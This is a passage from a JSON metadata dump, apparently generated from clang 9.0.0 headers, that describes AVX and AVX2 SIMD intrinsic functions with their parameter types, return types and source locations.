"name": "_mm256_setr_m128d", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:5024:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__lo", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__hi", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_setr_m128i", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:5045:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__lo", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__hi", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_abs_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:27:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_abs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:33:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_abs_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:39:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_packs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:45:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_packs_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:51:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_packus_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:57:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_packus_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:63:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V1", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__V2", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_add_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:69:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_add_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:75:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_add_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:81:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_add_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:87:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_adds_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:93:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_adds_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:99:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_adds_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:105:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_adds_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:111:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_and_si256", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:121:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_andnot_si256", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:127:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_avg_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:133:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_avg_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:139:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_blendv_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:145:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V1", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__V2", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_cmpeq_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:156:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_cmpeq_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:162:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_cmpeq_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:168:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_cmpeq_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:174:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_cmpgt_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:180:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_cmpgt_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:188:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_cmpgt_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:194:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_cmpgt_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:200:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_hadd_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:206:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_hadd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:212:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_hadds_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:218:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_hsub_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:224:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_hsub_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:230:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_hsubs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:236:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maddubs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:242:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_madd_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:248:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_max_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:254:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_max_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:260:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_max_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:266:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_max_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:272:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_max_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:278:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_max_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:284:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_min_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:290:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_min_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:296:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_min_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:302:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_min_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:308:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_min_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:314:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_min_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:320:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_movemask_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:326:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm256_cvtepi8_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:332:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_cvtepi8_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:340:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_cvtepi8_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:348:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_cvtepi16_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:356:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_cvtepi16_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:362:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_cvtepi32_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:368:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_cvtepu8_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:374:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_cvtepu8_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:380:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_cvtepu8_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:386:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_cvtepu16_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:392:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_cvtepu16_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:398:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_cvtepu32_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:404:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mul_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:410:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mulhrs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:416:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mulhi_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:422:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mulhi_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:428:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mullo_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:434:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mullo_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:440:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mul_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:446:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_or_si256", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:452:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_sad_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:458:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_shuffle_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:464:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_sign_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:479:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_sign_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:485:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_sign_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:491:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_slli_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:503:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__count", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_sll_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:509:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__count", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_slli_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:515:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__count", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_sll_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:521:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__count", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_slli_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:527:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__count", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_sll_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:533:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__count", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_srai_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:539:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__count", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_sra_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:545:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__count", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_srai_epi32", "ns": 0, "location": 